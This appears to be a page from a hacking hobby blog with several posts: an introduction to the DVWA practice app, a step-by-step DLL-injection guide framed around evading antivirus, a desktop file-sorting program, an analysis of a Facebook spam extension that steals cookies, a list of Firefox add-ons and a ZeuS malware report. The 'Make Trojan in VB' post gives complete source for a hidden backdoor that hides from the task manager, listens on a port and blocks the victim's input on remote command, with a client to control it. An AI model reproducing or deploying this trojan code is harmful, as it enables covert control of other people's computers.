Damn Vulnerable Web App – Learn & Practise Web Hacking

DVWA in action


Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
It is a best platform to practice web application hacking and security.

Using this app, you can practice the following existing vulnerabilities:
SQL Injection
XSS (Cross Site Scripting)
LFI (Local File Inclusion)
RFI (Remote File Inclusion)
Command Execution
Upload Script
Login Brute Force

Earlier it was launched with few features only, but recently some new features have been added into this app. Some of the new features are:

Added Acunetix scan report.
All links use http://hiderefer.com to hide referrer header.
Updated/added ‘more info’ links.
Moved change log info to CHANGELOG.txt.
Fixed the exec.php UTF-8 output.
Moved Help/View source buttons to footer.
Fixed phpInfo bug.
Made DVWA IE friendly.
Fixed html bugs.
Improved README.txt and fixed typos.
Made SQL injection possible in sqli_med.php.

Warning: But before testing, do not upload it to your hosting provider’s public html folder or any working web server as it will be hacked because this application is damn vulnerable. It’s recommend that you download and install XAMP onto a local machine inside your LAN which can be used solely for testing.

You can also install it in your Backtrack machine. Generally we need xampp server to setup damn vulnerable web application but xampp server is nothing but a collection of apache, sql, perl, PHP, openssl and other server side software's but backtrack 5 has all of these software's installed. It means there is no need to install xampp on backtrack machine. All you need to do is to get damn vulnerable web app and put it on the root directory of backtrack.
To download dvwa: http://www.dvwa.co.uk/
 --DR34MHAXX



posted under | 170 Comments

Code(dll) injection

Prerequisites::
win32 programming
c++
Typical viruses sometimes inject their processes in another running process by using windows api functions.They then become harder to detect for the antivirus.In this article we will see how we can inject our code in the remote process thereby causing a remote dll to get loaded in the remote process' address space
The steps for injecting a dll in other process  are::
1.)Create (or open handle to) the process we want the dll to be injected in.
2.)Allocate some memory for the name of the dll in the desired process (in which we want to inject our dll) using VirtualAllocEx and WriteProcessMemory function.
3.)Obtain the address of LoadLibrary(to load the dll in remote process) in our process using functions GetModuleHandle and GetProcAddress.Here, we assume here that kernel32.dll (which contains the LoadLibrary ) will be loaded at the same address in the remote process .So that the address of LoadLibrary will not differ.
4.)After that we need to use the CreateRemoteThread function
(syntax::
HANDLE WINAPI CreateRemoteThread(hProcess,lpThreadAttributes,dwStackSize
,lpStartAddress,lpParameter,dwCreationFlags,
lpThreadId)
);) to spawn a new thread in the remote process and execute the function LoadLibrary(whose address is specified by the 4th parameter ie.lpStartAddress which we obtained in the above step 3).
4.)LoadLibrary will thus be the default function to be executed in the remote process' thread once it (ie. the thread) starts since it's address has been passed to the CreateRemoteThread function.
5.)This will execute our LoadLibrary function with the parameter lpParameter(ie. the pointer to the name of the dll which we allocated in the remote address space using VirtualAllocEx and WriteProcessMemory in step 2)
6.)Once our dll is loaded the code inside it will be executed.
Thus we see that by using dll inject we can cause the remote application to behave arbitrarily in our own way.Other method to inject are by changing the value of the eip register(Later :))
For more reference and for the api documentation refer to msdn and codeproject..

Working app::http://www.mediafire.com/?858h6tcstxcujo5

Let me know if there are any bugs with the implementation.
~~crank

posted under | 4 Comments

DESKTOP CLEANING APPLICATION

From various souces around we get many files on our desktop which are not to be used right then but to be kept for later use.This application is to clean your desktop. It would check the extension of your file and send it to the desired location.Various windows API functions have been used in the coding. The file management functions with their parameters and brief description is as follows:


1.)FindFirstFile function: Searches a directory for a file or subdirectory with a name that matches a specific name (or partial name if wildcards are used).
  SYNTAX: HANDLE WINAPI FindFirstFile (LPCTSTR lpFileName,LPWIN32_FIND_DATA lpFindFileData);
 PARAMETERS:
lpFileName [in]
The directory or path, and the file name. Since we are talking of a particular case we have given the path of our desktop. We have used * with extension of files we want to move.
lpFindFileData [out]
A pointer to the WIN32_FIND_DATA structure that receives information about a found file or directory.

If the function succeeds, the return value is a search handle used in a subsequent call to FindNextFile, and the lpFindFileData parameter contains information about the first file or directory found.
If the function fails or fails to locate files from the search string in the lpFileName parameter, the return value is INVALID_HANDLE_VALUE and the contents of lpFindFileData are indeterminate.




2.)FindNextFile function : 
     Continues a file search from a previous call to the FindFirstFile function.
   SYNTAX:
   BOOL WINAPI FindNextFile(HANDLE hFindFile,LPWIN32_FIND_DATA lpFindFileData);
  PARAMETERS:
hFindFile [in]
The search handle returned by a previous call to the FindFirstFile function.
lpFindFileData [out]
A pointer to the WIN32_FIND_DATA structure that receives information about the found file or subdirectory.
The structure can be used in subsequent calls to FindNextFile to indicate from which file to continue the search.
If the function succeeds, the return value is nonzero and the lpFindFileData parameter contains information about the next file or directory found.
If the function fails, the return value is zero and the contents of lpFindFileData are indeterminate

3.)MoveFile function :
Moves an existing file or a directory, including its children.

SYNTAX:BOOL WINAPI MoveFile(LPCTSTR lpExistingFileName,LPCTSTR lpNewFileName);

PARAMETERS:
lpExistingFileName [in]
The current name of the file or directory on the local computer. The location from where we are moving our file.
lpNewFileName [in]
The new name for the file or directory. The new name must not already exist.The location where we want to move our file.

If the function succeeds, the return value is nonzero.If the function fails, the return value is zero.





Here's the source code::
#include<windows.h>
#include<stdio.h>
#include<conio.h>
void cpp(void);
void mp3();
void jpg();
int main(void)
{

cpp();
mp3();
jpg();
getch();
return 0;
}
void cpp()
{
      HANDLE hwnd;
      WIN32_FIND_DATA a;
      hwnd=FindFirstFile("C:\\users\\neha\\desktop\\*.cpp",&a);
      puts(a.cFileName);
      char from[100]="C:\\users\\neha\\desktop\\";
      char to[100]="E:\\cpp\\";
      strcat(to,a.cFileName);
      strcat(from,a.cFileName);
      MoveFile(from,to);
      while(0!=FindNextFile(hwnd,&a))
      {
                                     puts(a.cFileName);
                                     char from1[100]="C:\\users\\neha\\desktop\\";
                                     char to1[100]="E:\\cpp\\";
                                     strcat(from1,a.cFileName);
                                     strcat(to1,a.cFileName);
                                     MoveFile(from1,to1);
 
    }
}
void mp3()
{
      HANDLE hwnd;
      WIN32_FIND_DATA a;
      hwnd=FindFirstFile("C:\\users\\neha\\desktop\\*.mp3",&a);
       puts(a.cFileName);
      char from[100]="C:\\users\\neha\\desktop\\";
      char to[100]="E:\\selected songs\\";
      strcat(to,a.cFileName);
      strcat(from,a.cFileName);
      MoveFile(from,to);
      while(0!=FindNextFile(hwnd,&a))
      {
                                      puts(a.cFileName);
                                      char from1[100]="C:\\users\\neha\\desktop\\";
                                      char to1[100]="E:\\selected songs\\";
                                      strcat(from1,a.cFileName);
                                      strcat(to1,a.cFileName);
                                      MoveFile(from1,to1);
                                    
}

}
void jpg()
{
      HANDLE hwnd;
      WIN32_FIND_DATA a;
      hwnd=FindFirstFile("C:\\users\\neha\\desktop\\*.jpg",&a);
       puts(a.cFileName);
      char from[100]="C:\\users\\neha\\desktop\\";
      char to[100]="E:\\pictures\\";
      strcat(to,a.cFileName);
      strcat(from,a.cFileName);
      MoveFile(from,to);
      while(0!=FindNextFile(hwnd,&a))
      {
                                      puts(a.cFileName);
                                      char from1[100]="C:\\users\\neha\\desktop\\";
                                      char to1[100]="E:\\pictures\\";
                                      strcat(from1,a.cFileName);
                                      strcat(to1,a.cFileName);
                                      MoveFile(from1,to1);
                                    
}

}


---By:: cyb3R 4ng3ls

posted under | 1 Comments

Analysing facebook spam pages[Depth]

Spam alert. Avoid this.
I was browsing facebook today when a link caught my attention.

Lol !Checkout this video its a very embarrassing moment for her

The moment i looked upon it i knew that its a spam and i didnt had much to do so i tried to learn what it did.
after clicking on the link we get redirected to http://awts-on-tv6.blogspot.com/?video
since most of the people will try to watch the video and for that the website requires you to download and install a plugin.
in this case that plugin is Youtube Premium Plugin.(cleverly crafted, or is it though?)
So i click on install plugin and B00m all of my friends on facebook have their walls +1'd by a new post,
created by me (funny i never did that).
and that post again randomly changes.
Lesson 1: never install those plugins.
but lets say that you did, ofcourse i DID!
then lets move to the next step, analysing.
notice the top right corner it says that i installed the plugin.
even after installing the video isnt visible so i take it as a Spam.
Warning if doing this kind of testing, beforehand logout your facebook profile. i will explain later why.




now it is installed and i have logged of before hand thus making the plugin fail and none of my friends got spammed again so that they again do what i accidently did with their sorry hands.


next thing we do is go to the core of this plugin
i already knew that chrome stays in %homedrive%\\users\\<username>\\appdata\\local\\google\\chrome
therefore if a plugin is actually installed then it is residing in this directory for sure. unless its some sort of malware. which i found to be a false claim, yes its definetly a spam.


moving further we have a folder called user data in the application
upon browsing all the folders and subfolders i finally found the place where plugins are installed.
C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\Extensions
there were two folders here during my time.
opening them i found many files, one said mibbit.png ..... and other folder said icon.png.
since one extension i installed was mibbit IRC client and other one was this youtube one we are currently trying to break down. we arrive to the conclusion that other folder was our final extension.




in that folder there was only one file which could do anythnig to our browser. i.e. .js file or javascript
a section of that file i have shown in image. notice the highlighted part
in all of the javascript there is only one URL and no other malicious functions.
http://betterfinace.com/script.js
thus my curiousity grew. upon opening the file i got this
another link and opening this marked link i get final thing. you can open the js link and it isnt malicious in any way i assure you. your browser wont execute that and will only open js file in text mode for you to see.
the first function enchulatuFB tells us that the coder of this thing is of spanish origin.
next thing we note is tons of functions.
1st: uses iframes to post some data
2nd the highlighted part says the following in the messagebox. read comments for more information. as of now remember that i puts the images given in the messagebox on the screen like in the first image given by me check out the girl in bottom. thats the image this function loads.
also note that malicious attackers can be able to infect your pc with a string like aaaaasdhjhnfajsdasldlas  so dont try to execute them since they can be simple machine code which can harm you in any possible way. avoid direct gibberish code execution at all costs. what i did alert(string.convert.....); was stupid dont do that.
3rd function: reads cookies of browser and stores them somewhere.
4th function sets cookie passd by parameter
5th and 6th function are used in collaboration to set predefined strings in diffferent order.
like
 'check this out ... shocking ',' This shocking ...', 'I hate it happened to her ..'
  'check this out ... OMG ',' Ehey ',' Hey ',' Hey! ',' LOL ',' Hello! ',' Look! ',' This is sic.. ',' Damn!'
    'u wont believe! ',' check this embarrassing video ',' why did this happen to her?'
    ' Bizarre . '
thus explaining random order of strings which i got and my friends got after infection.

last and finally fb_comparte function uses facebooks cookies to generate new request for browser to evaluate friends of the victim and post the aforementioned strings on everyone of thei walls. thus making this campaign a hit. :)
for better understanding of the javascript read some good books then check the js file out.
it will explain everything about how elements of a webpage are grabbed to view friend lists and how [POST] request can send data to another user using forms. as a result their walls can get flooded with such spams.
i hope you would have understood how to analyze anything like this if it comes good in future.

posted under | 1 Comments

Learn how to Make Trojan in VB (Code)

Writing a Trojan is a lot easier than most people think. All it really involves is two simple applications both with fewer than 100 lines of code. The first application is the client or the program that one user knows about. The second is the server or the actual “trojan” part. I will now go through what you need for both and some sample code.
Server
The server is the Trojan part of the program. You usually will want this to be as hidden as possible so the average user can’t find it. To do this you start by using
Code: VB
Private Sub Form_Load()
     Me.Visible = False
End Sub
This little bit of code makes the program invisible to the naked eye. Now we all know that the task manager is a little bit peskier. So to get our application hidden from that a little better we make our code look like this. 
Code: VB
Private Sub Form_Load()
     Me.Visible = False
     App.TaskVisible = False
End Sub
So now, we have a program that is virtually invisible to the average user, and it only took four lines of code. Now all of you are thinking that this tutorial sucks right about now so lets make it a lot better by adding functions to our Trojan!
The first thing we want to do is make it be able to listen for connections when it loads. So in order to do this we need to add a Winsock Control. I named my control win but you can name yours what ever.
Now to make it listen on port 2999 when the Trojan starts up we make our code look like this.
Code: VB
Private Sub Form_Load()
     Me.Visible = False
     App.TaskVisible = False
     win.LocalPort = 2999
     win.RemotePort = 455
     win.Listen
End Sub
This code will set the local open port to 2999 and the port it sends it to is 455. So now, we have a program that listens but still doesn’t do anything neat. Lets make it block the input of the user completely when we tell it to!
To do this little devious thing we need to add a module with the following code 
Public Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long
Then we add this code to our main form:
Code: VB
Private Sub win_ConnectionRequest(ByVal requestID As Long)
     win.Close
     win.Accept requestID
End Sub
Private Sub win_DataArrival(ByVal bytesTotal As Long)
    win.GetData GotDat
    DoActions (GotDat)
End Sub
The code in the module is called a windows API. It uses a dll file to do tasks that we want. Now this code still won’t block the users input but we are very close. We now need to program the DoActions function that we called on our main form. In case you were wondering the code that we added to the form does two different things. The first sub makes it so all connection requests are automatacly accepted. The second sub makes it so all data is automaticly accepted and it then passes all of the data to the function DoActions which we are about to code.
For the DoActions code, we want to make a public function in the module. So add this code to the module and we are about done with the server of the Trojan!
Code: VB
Public Function DoActions(x As String)
     Dim Action
     Select Case x
             Case "block"
             Action = BlockInput(True)
     End Select
End Function
Ok now we have a program that when the data “block” is sent to it on port 2999 it will block the users input. I made a Select Case statement so it is easy to modify this code to your own needs later on. I recommend adding a unblock feature of your own. To do that just call the BlockInput function with the argument False instead of true.
Main Form
Code: VB
Private Sub Form_Load()
     Me.Visible = False
     App.TaskVisible = False
     win.LocalPort = 2999
     win.RemotePort = 455
     win.Listen
End Sub

Private Sub win_ConnectionRequest(ByVal requestID As Long) ' As corrected by Darkness1337
     win.Close
     win.Accept requestID
End Sub
Private Sub win_DataArrival(ByVal bytesTotal As Long)
     win.GetData GotDat
     DoActions (GotDat)
End Sub
Remember to add your winsock control and name it to win if you use this code.
Code: VB
Module
Public Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long                     
Public Function DoActions(x As String)
     Dim Action
     Select Case x
               Case "block"
               Action = BlockInput(True)
     End Select
End Function
That’s all there is to the server side or Trojan part of it. Now on to the Client.
Client
The client will be what you will interact with. You will use it to connect to the remote server (trojan) and send it commands. Since we made a server that accepts the command of “block” lets make a client that sends the command “block”.
Make a form and add a Winsock Control, a text box, and three buttons. The Text box 
should be named txtIP if you want it to work with this code. In addition, your buttons should be named cmdConnect, cmdBlockInput, and cmdDisconnect. Now lets look at the code we would use to make our Client.
Code: VB
Private Sub cmdConnect_Click()
     IpAddy = txtIp.Text
     Win.Close
     Win.RemotePort = 2999
     Win.RemoteHost = IpAddy
     Win.LocalPort = 9999
     Win.Connect
     cmdConnect.Enabled = False
End Sub
Private Sub cmdDisconnect_Click()
     Win.Close
     cmdConnect.Enabled = True
End Sub
 Private Sub cmdBlockInput_Click()
     Win.SendData "block"
End Sub
That is the code for the client. All it does is gets the Ip Adress from txtIp and connects to it on remote port 2999. Then when connected you can send the “block” data to block off their input.
Do post in your comments for any Queries
Posted By :- |-|A|_F B|_00d Pr|nCe 

SOME IMPORTANT FIREFOX ADDONS FOR DEVELOPMENT & SECURITY .



Well, according to the latest survey firefox is the second most used browser in the world. chrome is definitely catching up. And to be very frank , its the browser of my choice:D (
Now the question arises, why firefox?
you may choose firefox because it is fast, safe and open-source, which means you can modify  anything for it( if you know how).It is multi platform and the most important is its pluggable extension feature, it means that firefox gives you certain number of features and if you want to make it more you can make extensions.
about firefox security
While no browser is 100% secure Mozilla Firefox has much better security than Internet Explorer. Firefox does not support Activex which is a tool that can be used with good and bad intentions. Activex allows web sites to have more access to Windows. As a result of this, cyber criminals have taken advantage of it. This means that viruses and spy ware (and sometimes other types of malware as well such as adware) can take advantage of it, resulting in these programs ending up on the visitors computer (if using Windows at the time). Spyware is any piece of software that silently gathers information about a user while he/she navigates the Internet and transmits the information to an individual or company that uses it for marketing or other purposes.Spyware and other types of Malware usually do not target Firefox, but there is some out there that will also get Firefox, but it is rather unlikely that a Firefox user would get it. Unless for example they install loads of extensions from all kinds of web sites. So don't install an add-on if the website doesn't look trustworthy .If a Firefox user has the cache turned on a Trojan can end up in it. A cache is an amount of space in which Firefox uses to temporarily store images and other files from sites so you can load the page up quicker if you chose to go back and view the page again. You can turn it off by going to "Tools" then "options" click on the "advanced" tag and then the "cache" tag set the amount of MB's it's allowed to use to "0". However a Trojan just sit their in the catch and will not do anything unless the user actually opens it.
FIREFOX ADDONS
Add-ons are installable enhancements to the Mozilla Foundation's projects, and projects based on them. Add-ons allow the user to add or augment application features, use themes to their liking, and handle new types of content.So, Add-ons give Firefox many new options and functions. How to get them? www.google.com or mozillas extension site which is at addons.mozilla.org.some useful addons for development & security in my opinion are:
1. GREASE MONKEY:  This allows you to customize the way a web page displays or behaves, by using small bits of JavaScript.
download link:
https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/?src=cb-dl-users
2. FIRE BUG: Firebug integrates with Firefox to put a wealth of development tools at your fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.
download link:
https://addons.mozilla.org/en-US/firefox/addon/firebug
3.RIGHTTOCLICK: It enables right-click, text selection, context-menu, drag&drop and much more where it is disabled by Javascript.RightToClick protects from annoying alert pop-ups, can remove many timer actions and is able to suppress (unusual) click behavior. The highly sophisticated engine also offers options for fine tuning. Finally it's helpful with image downloads (also disabling CSS might be useful here).
download link:
https://addons.mozilla.org/en-us/firefox/addon/righttoclick
p.s- if you have not noticed yet, then let me inform you that you can use this addon in this blog also, try it.
4. NOSCRIPT:This add-on is used for security. It simply blocks malicious scripts, applets and flash. A disadvantage of this is if you want a script to be run on a site when visiting, you must unblock it. To read more about this addon:
http://teamhackaholic.blogspot.com/2011/06/noscript-security-against-active.html
5.ADD-N-EDIT COOKIES:No comment. You know what it does. but this add-on is not available for the 7.0,1 version.
6.ADBLOCK PLUS:The add-on is supported by over forty filter subscriptions in dozens of languages which automatically configure it for purposes ranging from removing online advertising to blocking all known malware domains. Adblock Plus also allows you to customize your filters with the assistance of a variety of useful features, including a context option for images, a block tab for Flash and Java objects, and a list of blockable items to remove scripts and stylesheets.
download link:
https://addons.mozilla.org/en-US/firefox/addon/adblock-plus
7.WEB-DEVELOPER:The Web Developer adds various web developer tools to your browser.
download link:
https://addons.mozilla.org/en-US/firefox/addon/web-developer
8.LIGHT SHOT: if you want a screenshot of a website immediately, then this tool is very useful for you.LightShot is a tool allowing you to easily make screenshots of any selected area in a browser tab.
downloading link:
https://addons.mozilla.org/en-US/firefox/addon/lightshot
9.HACKBAR: Well if you are a web develper and concerned about your website security, then this Add-on is made for you. we have already explained about this add-on in our blog earlier. follow the link to read more:http://teamhackaholic.blogspot.com/2011/06/firefox-hacking-addon-hackbar.html
10.ALL-IN-ONE SIDEBAR:This is made for the ease of the user.All-in-One Sidebar is a wonderful extension that provides you easy access to your bookmarks, downloads, history, themes and extensions, and more.
download link:
https://addons.mozilla.org/en-US/firefox/addon/all-in-one-sidebar
note: all the add-ons are explained keeping in mind that you are using the latest firefox version,i.e. 7.0.1, many security issues and bugs have been patched in this version. Otherwise if you are using the earlier versions of firefox, then many security related add-ons are available which are very important:
some of them are:XSS-ME, SQL INJECT ME etc.


posted by:-DR34MHAXX


posted under | 2 Comments

ZeuS Spreading via Facebook Friends Request


New spamming campaign has been reported by Trend micro. This type of malware is spreading through Facebook.  The downloaded malware is another type of Zbot, also called Zeus a Trojan horse that attempts to steal confidential information from the compromised computer. It may also download configuration files and updates from the Internet.
Malware spreads by sending messages to victims that includes Facebook friend request notification. When user clicks to approve the friend request link opens a page that invites him to install the latest version of Adobe Flash Player. But here the link takes user to install TSPY_ZBOT.FAZ instead of Adobe Flash Player.


This spyware adds registry entries to enable its automatic execution at every system startup. It attempts to steal information, such as user names and passwords, used when logging into certain banking or finance-related websites.
Generally Trojan.Zbot files are used to compromise computers is generated using a special toolkit that is available in marketplaces for online criminals. Toolkit allows an attacker a high degree of control over the functionality of the final executable that is distributed to targeted computers.
The Trojan itself is primarily distributed through spam campaigns and drive-by downloads, though given its versatility, other vectors may also be utilized. The user may receive an email message purporting to be from organizations such as the FDIC, IRS, MySpace, Facebook, or Microsoft.

Older Posts

Followers

    !!!! LeTs ChAt !!!!

    AddThis

    Share |

    Hack'a'Holic

    Subscribe to hackaholicteam

    Powered by in.groups.yahoo.com

    Blog Archive

    Powered by Blogger.